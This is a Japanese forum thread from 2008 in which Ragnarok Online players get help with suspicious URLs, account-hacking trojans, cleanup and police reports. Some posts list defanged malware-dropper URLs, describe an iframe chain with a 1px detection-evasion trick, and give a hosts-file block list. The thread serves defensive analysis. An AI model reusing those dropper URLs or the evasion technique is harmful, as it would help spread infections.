ttp://www■amury■com/reading■html
リネトロイのリスト内の物らしいんだけど
ttp://www.aguse.jp/で見るとただの跡地ぽいんだよね。
これって危ないURL?

249 名前:(○口○*)さん:08/04/11 23:58 ID:Il078EVY0
>>1

250 名前:(○口○*)さん:08/04/12 04:01 ID:Knaqw/kcO
っソースチェッカーオンライン

251 名前:(○口○*)さん:08/04/12 14:45 ID:DqnwAWaA0
ソースチェッカーオンラインで
安全度とカーソル合わせた時の説明はわかるけど
ソースが安全かどうかはどうやって見ればいいかな?

252 名前:(○口○*)さん:08/04/12 15:20 ID:lIkQtn+t0
>>251
それを自分で判断するんだ。危険なサイトの特徴があるかどうかを。

サイズ0のiframe読み込みがあって、カウンターとかじゃなく、なおかつ、既知の危険アドレスであるとか、
なにかのexeを読み込ませようとするものであるとか、既知のアカハック先と同じようなスクリプトあるとか、
Wikiのサイドメニューのリンク先が全部同じで、TOPページと別サイトであるとか、
アニメカーソルを読み込ませるようになっていて、そいつの中身が(以下省略

ある程度は読み取ったけど、ここがわからないとかなら、ここで質問しても歓迎される。
なにがわからないのかもわかりませんというなら、htmlの読み方から覚えてこいと放置される。

253 名前:(○口○*)さん:08/04/12 15:27 ID:8fHJzLQl0
zipファイル落とさないでアクセスしただけなら大丈夫だよな・・・

254 名前:(○口○*)さん:08/04/12 16:02 ID:grzDFqCA0
ここはアドレスじゃなくてもいいのでしょうか

【ファイル名】c:\windows\system32\optserve■exe
【 気づいた日時】昨日の23時頃
【 ウイルススキャン結果】avast4,8(無料版)でマルウェアと診断

googleで検索したところ、なにやらよろしくない物のようで
判断を仰ぎたく貼らせていただきます

255 名前:(○口○*)さん:08/04/12 16:08 ID:u/3vt/pV0
>>254
アンインストール方法
ttps://www■optmedia■jp/techinfo/detail/?did=0000005

256 名前:(○口○*)さん:08/04/12 16:09 ID:DqnwAWaA0
>>252
なるほど。暇な時にでも勉強してみる・・

257 名前:(○口○*)さん:08/04/12 16:34 ID:grzDFqCA0
>>255
ありがとうございます
調べたところ、キーボードレッスン6というものが入っていたらしく
それで広告等が表示されていたようです

キーボードレッスンをアンインストールし、おそらく元に戻ったと思われます
ありがとうございました

258 名前:(○口○*)さん:08/04/13 00:18 ID:RUjVVhMn0
アカハックではないので、こちらで。spamメールにくっついてきたもの。
いずれも、リンクさせようとするのが、グーグル経由。
例)ttp://www■google■com/pagead/iclk?sa=l&ai=OsSboo&num=(数値)&adurl=該当アドレス

ttp://www■omshoponline■com/gallery■php
ttp://www■omshoponline■com/gallery■html
ttp://www■omshoponline■com/gg■html
ttp://www■omshoponline■com/mgp■exe

ttp://www■miles-stein■de/gallery■php
ttp://www■miles-stein■de/gallery■html
ttp://www■miles-stein■de/gg■html
ttp://www■miles-stein■de/mgp■exe

ttp://e-kasa■w8w■pl/video■exe
ttp://www■bambinidimanina■org/video■exe
ttp://gaan■co■kr/video■exe
ttp://www■sural-autoparts■com/video■exe
ttp://mitoltd■com■tr/video■exe
ttp://missonline■es/video■exe
ttp://westphoto■org/video■exe
ttp://normrestorasyon■com/video■exe
ttp://fernbedienung■ch/video■exe
ttp://robert■nogacki■9■w■interia■pl/video■exe
ttp://ricekorea■co■kr/video■exe
ttp://www■ccav■org■ar/video■exe
ttp://westphoto■org/video■exe

259 名前:(○口○*)さん:08/04/13 00:19 ID:RUjVVhMn0
(続き)
video.exeは直接呼びだされ、gallery.phpは、
gallery.html->gg.html & mgp.exe の順に本体を呼びださせる。

アドレスは数日で使えなくなる様子。実体は全部同じもの。
gallery.html : NotDetected
gg.html : Trojan-Downloader.JS.Iframe.ey
mgp.exe : Trojan-Downloader.Win32.Exchanger.u
video.exe : Trojan-Downloader.Win32.Exchanger.r

gallery.htmlは、アカハックと同じようにiframeで他のページを呼び出すが、
サイズ0ではなく、style="width:1px; height:1px;" という書式になっていることで
セキュリティソフトの検出避けを試みている模様。回避手法の一例として紹介。

でも、呼びだされた先や本体は殆どのベンダーが対応済みなので、gallery.htmlが
すり抜けても実害はなさそう。

260 名前:(○口○*)さん :08/04/13 02:38 ID:4Kyt02nW0
ttp://www■skywebsv■com/Blog/
を踏んでしまい知人が感染いたしました。

OSを入れなおしたのですが、データのバックアップは
感染時に接続していた外付けHDDにいたしました。

バックアップデータをCドライブに戻しても問題ないでしょうか?
また外付けHDDも初期化するべきでしょうか?

261 名前:(○口○*)さん:08/04/13 02:43 ID:RUjVVhMn0
>バックアップデータをCドライブに戻しても問題ないでしょうか?
感染していないデータであれば、戻しても問題無い。
前提条件である、感染していないデータかどうかの判断ができない場合は、誰も安全性を保証できない。

まず大丈夫だとは思うが、現在しられているマルウェアの中には、リムーバブルディスクを含む、
稼動時に接続されているすべてのドライブのオートランに取り付いて、繋いだだけで自身を実行させようと
試みるものもいる。

よって、これも、安全性を保証できない。

踏んでしまった時点と現時点での中身が異なる可能性もあるが、誰か奇特な人が、検体を入手し、
検出名をはっきりさせた後なら、その検出名のマルウェアの挙動について検索し、理解し、
安全かどうかを判断する参考にすることができる。

結局のところ、全ては"自己責任"という4文字に集約される。

262 名前:(○口○*)さん:08/04/13 02:58 ID:RUjVVhMn0
アカウントハック総合対策スレ9
ttp://gemma.mmobbs.com/test/read.cgi/ragnarok/1195956271/592

報告のアドレスについては、総合スレで言及されている。
呼びだされるファイルについては、該当のvirusTotal結果を見るとこうなっている。
4/6「Trojan.Win32.Inject.amb」

4/8に検体提出した際にも「Trojan-PSW.Win32.OnLineGames.wmz/Trojan.Win32.Inject.amb」であった。
(k1.exeには2つのファイルが含まれており、検出名は2つ存在する)
現時点で捕獲してスキャンした結果の検出名も同じである。

仮に、踏んだのが4/6〜4/13 2:50頃の間であれば、上記の2つについての解説サイトを確認し、
感染するような挙動をとったかどうかを判断すればいいことになる。
そのものずばりがない場合は、亜種区別の部分を削って、類似するものの挙動を確認すべし。

263 名前:まとめ臨時 ◆kJfhJwdLoM:08/04/13 05:57 ID:Lv4p4/JW0
>>258-259
アカハックではない と言う文章を読みすごし、
サイト名をaguse.jpやGoogle先生で名前検索していました。
video■exeの置き場所のトップページは
えろそうなページやらレンタルサーバーっぽい画面が出てきたりしちゃったりして、
当然と言えばなんですけど世界のドメインって色々あるんですね…。

>アドレスは数日で使えなくなる様子。実体は全部同じもの。
との事でしたが、その点がどうなるのか判らなかったので、
臨時用?にそれ用のリストを貼って見ました。

264 名前:まとめ臨時 ◆kJfhJwdLoM:08/04/13 05:58 ID:Lv4p4/JW0
以下>>258-259 で報告の臨時用

127.0.0.1 www■omshoponline■com
127.0.0.1 www■sural-autoparts■com
127.0.0.1 www■normrestorasyon■com
127.0.0.1 www■miles-stein■de
127.0.0.1 www■missonline■es
127.0.0.1 www■e-kasa■w8w■pl
127.0.0.1 www■robert■nogacki■9■w■interia■pl
127.0.0.1 www■bambinidimanina■org
127.0.0.1 www■westphoto■org
127.0.0.1 www■westphoto■org
127.0.0.1 www■ccav■org■ar
127.0.0.1 www■fernbedienung■ch
127.0.0.1 www■ricekorea■co■kr
127.0.0.1 www■gaan■co■kr
127.0.0.1 www■mitoltd■com■tr
127.0.0.1 omshoponline■com
127.0.0.1 sural-autoparts■com
127.0.0.1 normrestorasyon■com
127.0.0.1 miles-stein■de
127.0.0.1 missonline■es
127.0.0.1 e-kasa■w8w■pl
127.0.0.1 robert■nogacki■9■w■interia■pl
127.0.0.1 bambinidimanina■org
127.0.0.1 westphoto■org
127.0.0.1 westphoto■org
127.0.0.1 ccav■org■ar
127.0.0.1 fernbedienung■ch
127.0.0.1 ricekorea■co■kr
127.0.0.1 gaan■co■kr
127.0.0.1 mitoltd■com■tr

追加として必要との要望がありましたらホムペのほうにも追加しますが、
いかが致しましょうか?

265 名前:(○口○*)さん:08/04/13 06:07 ID:BJ/ulIhw0
>>263
多分、↓で紹介されているドメイン・テイスティングを利用した手法だろう。
無料試用期間として設けられている5日間、Add Grace Period(AGP)を濫用し、費用を負担せずに次々とドメインを使い捨てる。
ttp://journal.mycom.co.jp/news/2008/01/31/011/

266 名前:(○口○*)さん:08/04/13 09:40 ID:RUjVVhMn0
>>264
追加はしなくていいと思う。ただの手法紹介だし。入れた時には失効してるドメインを入れる価値ないし。
それでもブロックしたい人なら、ここ↓のブロックリストを自己責任で入れればよし。
http://www.malware.com.br/

267 名前:(○口○*)さん:08/04/13 13:16 ID:RUjVVhMn0
>>260
書くの忘れてたが、相談なら、

■ >>4のテンプレ位埋めてこい
■ 知人本人つれてこい、代理は却下だ
>>6の通りにやっとけ

という訳で、出直してこいや〜〜〜〜〜〜〜

268 名前:(○口○*)さん:08/04/13 19:50 ID:g6QRWntx0
垢ハックされたので、Cドライブをクリーンインストールしまして
DドライブにはROが入っていて、ROを起動するとタスクマネージャの
プロセスタブに今まで無かったRagexe.exeがあるのですが・・・
これってまだウイルスが取れていない可能性高いでしょうか?

ちなみにカスペをインストールして使用しています。
カスペ使っててウイルスにかかってないけど、Ragexe.exeのプロセスが見えてる人など
いましたら教えてください。

269 名前:(○口○*)さん:08/04/13 19:59 ID:NxPGN54w0
リネージュ資料室より
ttp://lineage.paix.jp/guide/security/virus-site.html
2008年4月上旬、自動車総合サイトの「カービュー (carview.co.jp)」が
不正アクセスにより改竄され、ウィルスが埋め込まれました。
埋め込まれたのは fjp.js という名前のJavaScriptで、
オンラインゲームのアカウント情報を盗むウィルスのインストールを試みます。
カービューのお知らせではウィルス対策ソフトでのチェックを勧めていますが、
4月7日時点ではシマンテック、トレンドマイクロ、マカフィー、NOD32、avast!、 AVGの
いずれでも検出できませんでした。
心当たりの方は、カスペルスキーのオンラインスキャンの利用をお勧めします。

270 名前:(○口○*)さん:08/04/13 20:49 ID:RUjVVhMn0
>>269
fjp.js でぐぐってみると、埋め込まれたサイトのアドレスは、ttp://www■414151■com/fjp.js で
DNSで名前解決できなくなっている。>>265の指摘する手法で使い捨てられたドメインかもしれない。

ソースチェッカーで履歴が残っていたので、辿ってみると、fjp.js->index.htmと呼びだされ、
index.htmからは、Ajax.htm/Ms06014.htm/Real.htm/Bfyy.htm/Lz.htm/XunLei.htm が呼びだされる。

リネージュ資料室の置き場更新情報を見ると、www■k5dionne■comや、www■infosueek■comなどと
呼びだすファイル構成が同じようだ。

Backdoor.Win32.Hupigon.dsx/Trojan-PSW.Win32.LdPinch.beo/Trojan.Win32.Inject.ama/Trojan-PSW.Win32.OnLineGames.wmz
などのファイルを呼びだす模様。これは検体提出済みで、カスペは既に対応している。
他社は…まぁ、それなりに対応してくれることでしょう。多分。

271 名前:(○口○*)さん:08/04/13 21:46 ID:NxPGN54w0
ajax、bfyy、lz、qvod、pps、real、xunlei、yahooなどは
2117966と同じCuteQQで生成されるファイル群ですな。

272 名前:まとめ臨時 ◆kJfhJwdLoM:08/04/14 22:18 ID:+Ldcpn240
>>265-266
265さん、情報ありがとうございます。
でも今後その手法でやられると非常に厄介ですね…。
それに266さんの言われるように存在しないものを追加しても仕方ないですし、
と言いつつアカハック分とか危険なURLについては追加していたりします。

件の手法の無料5日間ドメインの利用って
BOTの使い捨て無料アカウントを連想してしまいました。

273 名前:(○口○*)さん:08/04/15 03:29 ID:qjzIGEsnO
>>268

正常

274 名前:268:08/04/15 16:56 ID:sLf2lfBLO
回答ありがとうございます。
おかげで安心しました。

275 名前:(○口○*)さん:08/04/16 01:11 ID:qa53opBv0
誘導されて、こちらのスレッドに、お金の関係で警察署まで行くのは
お金がきついので、最寄の交番でも大丈夫ですかね・・?
今、ガンホーに報告して、今日、警察に行くところなのですが・・・

276 名前:(○口○*)さん:08/04/16 01:31 ID:EmZmtLo20
交番じゃ流石に手に余ると思う。
面倒でも警察署まで出向かないと。
このスレをCtrl+Fで「警察」とでも検索すればいろいろ役に立つ情報があるかも。

277 名前:(○口○*)さん:08/04/16 15:53 ID:YOb9tyEW0
誘導するにも質問に答えて、次からはこっちでしてくれよな的に誘導すりゃいいのに
なんでテンプレ貼り付けるだけを延々繰り返すゴミがいるんだろうな

278 名前:(○口○*)さん:08/04/16 16:01 ID:Tp1mVwuT0
取り敢えず、こっちでコメントつけてあげようぜ。こっちでgdgd言ってるのもいい加減みっともない。

アカウントハック総合対策スレ9
ttp://gemma.mmobbs.com/test/read.cgi/ragnarok/1195956271/596
|596 (^ー^*)ノ〜さん sage 08/04/16 13:13 ID:Q6/4PDFF0
|NOD32アンチウイルス体験版て期限切れたらまた入れなおして使ってもok?

だめ、絶対。NOD32以外のメーカーでも、体験版は、購入するだけの価値があるか判断する為のものです。
いいと思ったらちゃんと購入しましょう。購入する気がないなら、フリーのセキュリティソフトを使いましょう。

279 名前:(○口○*)さん:08/04/16 16:08 ID:YOb9tyEW0
そもそも期日切れて再インストールしても、前の情報見て使えないんじゃなかったかね

280 名前:(○口○*)さん:08/04/16 16:33 ID:pvDLZeBz0
日付のチェックが無くて何度でも入れれる物も中にはあるけど
普通は再インストール出来ない。
もしする場合はOS再インストール。

レジストリ戻すだのなんだので裏技的な事をすれば可能な場合もあるが
そこまでするなら買えと言いたいわな。
高いものじゃないし、必要品なんだし。

そしてNOD32がどうなってるか知らない。
規約的にも問題あるし、どうしてもタダでやりたいなら、別でフリーのを
使う方がいい。

281 名前:(○口○*)さん:08/04/16 16:43 ID:Tp1mVwuT0
NOD32は体験版の使用登録したメールアドレスに一定期間有効なIDとパスが送られてくる。
捨てメールアドレスを用意すれば何回でもできるが、倫理的にやっちゃいけないだろう。

282 名前:(○口○*)さん:08/04/16 18:34 ID:zCxM4OIb0
>>275
つーかまず警察に電話はいれたのか?
いきなり行っても意味ないぞ。
ガンホーに報告したならメール返事きたよね。
そのなかから、各県のハイテク犯罪担当課へのリンクが探せるよね。
まず電話して事情説明し、アポとってから行くものだよ。

それと、このスレはじめから目通してくださいな。

283 名前:275:08/04/17 00:18 ID:6jSVlbxb0
やばい・・・驚天動地の極みに達したからか、手順がとち狂いまくり・・
ガンホー:こちらで調べます。
俺:警察に相談、IDやらパスやら、全部教えて、いろいろ質問に答える
帰ってきて今、レスを読んで、早まったかと後悔してる

284 名前:(○口○*)さん:08/04/17 04:03 ID:SydqF+ts0
>総合スレ9-598
|598 (^ー^*)ノ〜さん sage New! 08/04/17 01:31 ID:hlIIq9ty0
|3分で糞レス返すなんてどんだけ暇なんだwwwwwwwwww
|休日なら休め! ニートなら仕事探せ!

貴様には1つ上の投稿で十分だ
|597 (^ー^*)ノ〜さん sage 08/04/16 13:16 ID:jYvVWh+Q0
|重要な情報が埋れてしまわないようにする為、一般的なセキュリティ
|対策・相談・雑談はLiveROの雑談スレ(通称 セキュスレ)を利用して下さい。

|セキュリティ対策、質問・雑談スレ5
http://enif.mmobbs.com/test/read.cgi/livero/1205488101/

285 名前:(○口○*)さん:08/04/17 04:08 ID:zalIr0NY0
無理にこっちでレスする必要もないんだぜ、ほっとけ

286 名前:(○口○*)さん:08/04/17 05:51 ID:kLMXpPLA0
>>284
レス内容に対してきちんと返答できず煽り、特に人格叩きに走ってる時点で
自らの愚かさを認めて敗北宣言しているような物なので放置すりゃいいよ

>>283
警察といっても担当分野という物があるからな
上のレスにもあるように、ハイテク犯罪関係の部署に電話してから行かないと意味無いぞ
ちゃんと担当者の名前を聞いてメモってから行くようにな
様子を見ると肝心な時に慌ててしまうタイプに見えるので、最初から言いたい事をメモしておくのもあり

287 名前:(○口○*)さん:08/04/17 12:05 ID:Iiib8bGQ0
Firefox2.0.0.14リリース
Criticalな脆弱性の修正1件

288 名前:(○口○*)さん:08/04/17 12:13 ID:Iiib8bGQ0
ついでにSafari3.1.1リリース

289 名前:(○口○*)さん:08/04/17 18:42 ID:KxmW42MJO
カスペルスキーにしたんですが、起動時ごとにカスペルスキーのプロセスavp.exe数が変わるんですが(2〜3個です)、仕様でしょうか?

290 名前:(○口○*)さん:08/04/17 18:46 ID:SydqF+ts0
複数起動してるのは知ってるが、個数までは気にしたことなかったな。

スタートアップスキャンしてる間は1つ増えるとかじゃねーの?

291 名前:(○口○*)さん:08/04/17 18:50 ID:KxmW42MJO
いや、それが3個の時は電源落とすまで3個で、2個のときは電源落とすまで2個のままです。

292 名前:(○口○*)さん:08/04/17 22:26 ID:PiMANuEZ0
>>284-286
そのレスは煽ってオマイらのようなヤツが埋めてくれるのを
期待して書き込んでるんだから、あっちで書いとくれ

>>286
どこら辺が人格叩きなのか文盲な俺でも判る様に解説してくれ

レス内容に対しての返答 →暇な書き込みするなら休むか探せ

597に対してはきちんと返答しているぞ
内容に関してはスレにそぐわないのは重々判っているが

293 名前:(○口○*)さん:08/04/17 22:37 ID:SydqF+ts0
>>292
総合スレのテンプレを読んで理解してくれ。お前さんの書き込みはスレ違いの荒らし行為にしかなっていない。
>284-286に対するコメントも筋違い。総合スレを荒らさないようにこちらに持ち込んでるんだよ。

ここまで言っても理解できないなら、まずは半年ROMっててくれ。

294 名前:(○口○*)さん:08/04/17 22:39 ID:zalIr0NY0
真性様には何言っても無駄だーな

295 名前:(○口○*)さん:08/04/17 23:13 ID:mglWSIeS0
>>289
ここに仕様かどうかが分かる人が居るわけ無い
サポートに聞け

296 名前:(○口○*)さん:08/04/17 23:44 ID:KxmW42MJO
サポートに聞いたら仕様らしいです。そのときの状態で変化するそうです。失礼しました。

297 名前:(○口○*)さん:08/04/18 02:22 ID:rTRGmZZ10
>>293
 >>286は煽った当事者のレスだな

>>293-294
>まずは半年ROMっててくれ
>真性様には何言っても無駄だーな

          ____   
       / \  /\ キリッ
.     / (ー)  (ー)\      
    /   ⌒(__人__)⌒ \ 決まった……俺カッコイイ
    |      |r┬-|    |     
     \     `ー'´   /    
    ノ            \
  /´               ヽ              
 |    l              \
 ヽ    -一''''''"~~``'ー--、   -一'''''''ー-、.    
  ヽ ____(⌒)(⌒)⌒) )  (⌒_(⌒)⌒)⌒))

298 名前:(○口○*)さん:08/04/18 15:09 ID:/dWDkG8M0
自分自身で努力しましたが、不安が拭いきれない為書き込ませて頂きます。

【気付いた日時】今朝
【不審なアドレスのクリックの有無】「フェンリル板」とググって2番目に出ていたので、クリックしてしまった。
【アドレス】jbbs■livedoor■jp/computer/39711/
【OS】WindowsXP Home SP2
【使用ブラウザ】IE6.0 sp2
【アンチウイルスソフト】avast4.8
【その他のSecurty対策 】Spybot S&D
【ウイルススキャン結果】カスペル・avast・spybot全てに異常なし
【テンプレの参考サイトを読んだか】Yes
【hosts変更】無
【PeerGuardian2導入】無
【説明】
開いた時に何かあったわけでもないのですが、謎の掲示板にしか思えず。
ソースチェッカーでチェックも行い、ざっと自身で確認したところ、
問題は見つからなかったのですが、「Ragnarok Fenrir板」とつけられているので
RO関係であるという点で非常に不安に。
宜しくお願いします。

299 名前:(○口○*)さん:08/04/18 15:49 ID:U1MIeqMn0
>>298
フェンリル板はこっちだぞ
http://fenrir.rash.jp/fenrir/

ただ、そっちも普通のLivedoorのBBSで、怪しげなスクリプトも
【現時点では】見当たらないように思える。
【現時点で、見落としてなければ】無害ぽい。

管理人を自称する人の投稿も2/16〜18辺りで、なにかやろうとして
立ち上げたものの、放置されるようになった場所ではないかと思われる。

放置推奨。グーグルツールバーを入れてるなら、F5→投票の連続で、
正規のフェンリル板を検索上位になるようにするといいんじゃないかな。

300 名前:(○口○*)さん:08/04/18 17:22 ID:/dWDkG8M0
>>299
お手数お掛けしてしまって、申し訳ないです。
フェンリル板の正式な場所は知っていたんですが、いつも検索で行く癖がありまして。
グーグルツールバーは入れてないんですが、投票機能があるのですね。
インストールして誤爆で踏まないように、対応したいとおもいます。
本当に有難うございました。

301 名前:283:08/04/18 18:21 ID:VQUbqa2a0
ログインしてみたところ、キャラクターの
z及び、アイテムが無くなっていました

そして、当方のIDから持ち去ったと見られる
アイテムを露店に出している商人がいました
そのキャラクター名・露店の中身をSSにとってあります。

302 名前:283:08/04/18 18:25 ID:VQUbqa2a0
上が質問内容で、それに対して、ガンホーから

ご報告いただいた情報を元に調査を行った結果、お客様のご報告内容と一致しない、
アトラクションIDの使用形跡を確認致しました。

つきましては、お客様のアトラクションIDの使用状況について
いま一度、以下の点についてもご確認ください。
 ・家族や友人とのID共有や貸与
 ・ネットカフェやご友人宅でのゲームをプレイ
 ・不正ツールの使用
〜〜云々と色々続いて、最期にそれでも第3者による理由と思われる場合は
警察にご相談くださいと返事が返ってきました。
これは、垢ハックと認定されなかったということですよね?
どなたか、この状況になったことはありますか?

303 名前:283:08/04/18 18:26 ID:VQUbqa2a0
ウイルスを削除しようとして、起動に必要なファイルも消してしまったらしく
返事をすぐにすることができません・・・ どうか、そこはご容赦ください。
連投失礼

304 名前:(○口○*)さん:08/04/18 18:33 ID:U1MIeqMn0
>>302
|・ アカウントハッキングについて(ガンホー公式)
|  http://www.ragnarokonline.jp/playguide/hacking/

ガンホーに動いて貰う為には、必ず、警察に相談しなければなりません。

305 名前:283:08/04/18 18:37 ID:VQUbqa2a0
うーん・・・ 一応、警察には相談したのですが、ガンホー曰く
まだ、何も捜査協力依頼が来ていないらしいので、ここは警察の担当者
にもう一度、話してみるしかないですかね?

ガンホーが垢ハックと認定、でも手が出せません じゃあ、警察が
という流れだと思っていたのに・・・

306 名前:283:08/04/18 18:39 ID:VQUbqa2a0
ご報告いただいた情報を元に調査を行った結果、お客様のご報告内容と一致しない、
アトラクションIDの使用形跡を確認致しました。

この一文から、結局どうだったのか、読み取れない・・
これについても、お願いします。

307 名前:(○口○*)さん:08/04/18 18:41 ID:C6nykswW0
書いてあるとおりじゃないの?

308 名前:(○口○*)さん:08/04/18 18:42 ID:eu74ICHa0
何をどうお願いしますなんだ…

309 名前:(○口○*)さん:08/04/18 18:42 ID:nnox/brF0
読んだとおりの内容なのに理解できんのか

310 名前:283:08/04/18 18:47 ID:VQUbqa2a0
報告内容と一致しない 垢ハックではないと認定されたのなら
警察にお願いしても無理かなあと・・・

それで、同じような状況の人がいないかと・・・

311 名前:(○口○*)さん:08/04/18 18:53 ID:Q1I/bGgQ0
日本語でおk
>お客様のご報告内容と一致しない、アトラクションIDの使用形跡を確認致しました。
お前がこのときとこのときとこのときに繋いだって言ったののほかに、誰かが接続してたって言ってんだよ
だから警察行って犯罪だと認められてから出直してねって話

312 名前:283:08/04/18 18:55 ID:VQUbqa2a0
>>311氏 ありがとう!! やっと、理解できた!
そして、次にくるときは日本語で書き込んできます。

313 名前:(○口○*)さん:08/04/18 19:02 ID:tAdJKcKK0
動転してるからちゃんと理解出来てないんじゃないのか?
報告内容と一致しない仕様形跡を確認したってことは、
283以外の誰かが283のID使ってROに入ったってことだよ。

ガンホーから言われてるこれについて、283の思い当たることはないの?
 ・家族や友人とのID共有や貸与
 ・ネットカフェやご友人宅でのゲームをプレイ
 ・不正ツールの使用

これのどれでもないなら警察で相談しろってことです。

ここまでかいてリロードしたら311さんが分かりやすく説明してくれたぜ。
消すのめんどいから送信(゚∀゚)

あと、アカハックで気が回ってないだろうけど、まずはオチツケ。
落ち着いてセキュスレ1から読んで、過去スレも読んで、日本語でおkしろ。
動転すると二次被害だのなんだのあるからな。

314 名前:(○口○*)さん:08/04/18 21:26 ID:/FIxJq7e0
http://internet.watch.impress.co.jp/cda/news/2008/04/18/19291.html
>具体的には、カード決済で使う本人認証システム「3Dセキュア」を導入しているガンホーなどのゲームサイトで、
>抽出したクレジットカード番号と、サウンドハウスのサイトのパスワードをマッチングさせて本人認証を通過。
>その後、金券や商品を購入してRMT(Real Money Trade)などのサイトで転売するなど、足が付かないかたちで換金していたとしている。

315 名前:(○口○*)さん:08/04/19 12:36 ID:AkQgmSCQ0
【      気付いた日時          】 2008/04/14
【不審なアドレスのクリックの有無 】 RO関連の掲示板、RO関連ブログ数件のどこかでJ-WORDのようなPOPup出た記憶アリ
【  アドレス   】どれか不明
【     OS    】WindowsXP Home SP1
【使用ブラウザ 】IE6.0 sp1
【WindowsUpdateの有無】 2年ぐらい前?
【 アンチウイルスソフト 】 なし
【その他のSecurty対策 】 ルータ有
【 ウイルススキャン結果】 Ad-aware2008で未検出
【テンプレの参考サイトを読んだか】 Yes
【hosts変更】無
【PeerGuardian2導入】無
【説明】
・svchostが普段3個が4個起動されている
・TCP5000とUDP6876のポートをLISTENしてるぽい(fportより。実行ファイルは空欄)
・ネットにつなげておくと「win英数字ランダム5文字.exe」(26624バイト)と
 「英数字ランダム8文字ぐらい.exe」(こっちは消してしまった)
 がダウンロードされて実行される
 http://www■virustotal■com/jp/analisis/51395846e51168339cc5337f92caf83d
・rootkitbuster2.2.1014を起動したがなにもみつからない
・さらにしばらくあとに起動してみたらファイルサイズが2,277,376バイトに増えて
 (ダウン直後は2,200,032バイト)Integrity testでerror
・ウィルスバスターのオンラインスキャンは起動後、データ接続開始あたりの2%で止められる
・kasperskyはそもそも見られない orz
・avastのフリー版入れようとセットアップ起動するも、セットアップすら途中で止められる
・レジストリは他のrootkit系のさわりそうなところをざっと眺めたが見当たらず
・a-squaredのオンラインスキャンではrootkit.win32.agent.itとrootkit.win32.agent.jc発見検疫
  しかしまだ症状かわらず

それなりのレベルなネットワーク系SEだと思ってるが、検出できんから対処方法がみつからん。。。
rootkitやbackdoorの系統の、本体見えない系だとは思うのだが、なにか情報もらえないかな
最近のSQLインジェクション使ったブログ系統の感染症状なのか判断がつかない。
まぁ最悪はゴーストでイメージあるから戻すだけなんだが、なんとかつぶしたい
RO関連のHPしかみてないから、こっちで質問してみました
#気をつけててもアップデートしないとひっかかるんだなぁというのが実感。

316 名前:(○口○*)さん:08/04/19 12:47 ID:H32ozt8t0
↓ほどほどにしてくれよ

317 名前:(○口○*)さん:08/04/19 13:17 ID:WV5GzwjF0
いやー、ド素人な自分には何言ってるかサッパリッスよ〜
力になれなくてすいやせんね、ヘヘ

318 名前:(○口○*)さん:08/04/19 13:28 ID:vikRQvVS0
それなりのSEとか言ってサービス一覧とかスタートアップ見てないのか?
「開始」されてるのだけ数えりゃせいぜい20〜30だろうし全部当たってみりゃいい

319 名前:(○口○*)さん:08/04/19 13:43 ID:me5qBwY/0
>#気をつけててもアップデートしないとひっかかるんだなぁというのが実感。
自称SEの方ですか?
回りに被害を広める前にさっさと再インストールしろ

320 名前:(○口○*)さん:08/04/19 13:47 ID:hTltHr8d0
拾ってきたサイトも判らない
exeファイル名も判らない
そしてWindowsXP Home SP1

うちらにどうしろと
はいはいアップデートしましょうねー、とでも言って欲しいのか

321 名前:(○口○*)さん:08/04/19 14:09 ID:UEMR3v+60
>>320見てたら犬のおまわりさんが脳内で再生されたわwww

322 名前:(○口○*)さん:08/04/19 14:10 ID:CtuhdM0q0
それなりのレベルなネットワーク系SE(笑)

323 名前:(○口○*)さん:08/04/19 14:21 ID:AkQgmSCQ0
スタートアップはレジストリからみてたが、サービス一覧から中に書かれてる全起動ファイル確認は見落としてたわ
さんくす>318
まぁあやしげなのはとめたが変わらんようだ

ファイル名わかってれば対処ぐらい自分でするよ
欲しい情報は、ブログ感染系の奴の振る舞いの情報だったんだが。
感染後だから、アップデートは無意味だ
すでにネットから切り離していぢって遊んでるとこ

ちなみに、感染時は未発見、今は対策されたらしい
前述のファイルはTROJ_DLOADER.AHHとして検出されたわ
#隔離したファイルを別PCで検出しただけだから、本体はtrendmicroつながらんのだけどな。

324 名前:(○口○*)さん:08/04/19 14:32 ID:WV5GzwjF0
あぁ、釣りじゃないの
入れ食いだったから大喜びで宣言すると思ったのに

>>感染後だから、アップデートは無意味だ(キリッ
じゃねーよ、最初からしておけよ SP1ていつの話だよ

325 名前:(○口○*)さん:08/04/19 14:45 ID:aVT8DoAC0
そもそも今のSEは何でもSEで、言ったもの勝ちな職種になってるから、
(業界関係者)と同じくらいの意味しかないぞ。

326 名前:(○口○*)さん:08/04/19 14:51 ID:xphBn+iy0
使えないはメールとかの文章がルー大柴
ひどい奴はしゃべり方までルー大柴

一回オールデリートしてインストールをワンモアしちゃってよ

327 名前:326:08/04/19 14:52 ID:xphBn+iy0
使えないSEは だ・・・
俺も使えないSE

328 名前:(○口○*)さん:08/04/19 16:25 ID:eQqDh01e0
もはや、どこからどう突っ込むべきか・・・・・・・・・・

WindowsUpdateとセキュリティソフト完備(カスペかAntiVirのような対応の早いもの推奨)のPCも
HDDを外付で繋いでスキャンしてみれば、ルートキットも除去できるとは思うが、そこまでのものは
フォーマットでもしない限り回復不能だろう。多分、OSの基幹部分にまで食い込まれてる。

ダウンローダ+WindowsUpdateで塞いでない大穴=感染しまくり

なにをきっかけに、どこからどこまで食い込まれたか理解できっこないだろ。
>>315さんはそんなことよりも、OSの再インストールの仕方から勉強した方がいいと思う。

わたしなら、検体を拾って各社に送付した後は、HDDユーティリティーをCDブートして、
HDDの物理フォーマットから始めますね。

329 名前:(○口○*)さん:08/04/19 16:28 ID:4QbUcS/q0
XPSP3もそろそろ出るってのにSP1な奴は…。
Microsoftあたりが起動不能にしてくれんかねぇ。

330 名前:(○口○*)さん:08/04/19 16:34 ID:BS+j+Nwt0
問題解決能力、分析能力の有無が、真っ当なSEと、なんちゃってIT土方の間に存在する越えられない壁だな。

331 名前:(○口○*)さん:08/04/19 16:40 ID:eQqDh01e0
>>330
ここまで分析能力がないと、役立たずでしかないんだが…。
IT土方でも、自分がなにをやってどうなったのかの理解は最低条件じゃないのかなー。

越えられない壁の、手前にも届いてないと思う。

332 名前:(○口○*)さん:08/04/19 16:51 ID:2zGRuN/D0
>328
>315は「それなりのレベルなネットワーク系SE」ですよ?
>OSの再インストールの仕方から勉強した方がいいと思う。
これくらい、当然知ってますって ^^

と、>315を煽りたくなるぐらいの酷さだよな……

自分自身を過剰・課題に評価してるような自称SEは、OSの
再インストールの勉強以前に、学ぶ事があるよ。

333 名前:315:08/04/19 22:16 ID:AkQgmSCQ0
まぁゴーストのイメージから復帰させたからどーでもいいんだが。
これ、友人のノートなんで、俺にネットワークSEを説かれてもなぁ
#まぁ書いてないからそういわれても仕方ないか。ポップアップは全て
